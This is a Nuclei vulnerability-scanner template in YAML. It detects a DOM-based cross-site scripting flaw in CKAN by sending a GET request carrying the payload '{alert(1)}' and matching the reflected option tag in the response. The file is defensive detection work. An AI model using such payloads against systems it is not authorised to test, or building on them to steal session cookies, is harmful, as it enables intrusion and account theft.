nuclei-templates/vulnerabilities/other/ckan-dom-based-xss.yaml

38 lines
1.1 KiB
YAML

id: ckan-dom-based-xss
info:
name: Ckan - DOM Cross-Site Scripting
author: dhiyaneshDk
severity: high
description: Ckan contains a cross-site scripting vulnerability in the document object model via the previous version of the jQuery Sparkle library. An attacker can execute arbitrary script and thus can steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27
- https://security.snyk.io/vuln/SNYK-PYTHON-CKAN-42010
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: dom,xss
requests:
- method: GET
path:
- '{{BaseURL}}/?{alert(1)}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<option value="/en/?{alert(1)}" selected="selected">'
- type: word
words:
- 'text/html'
part: header
# Enhanced by md on 2022/09/20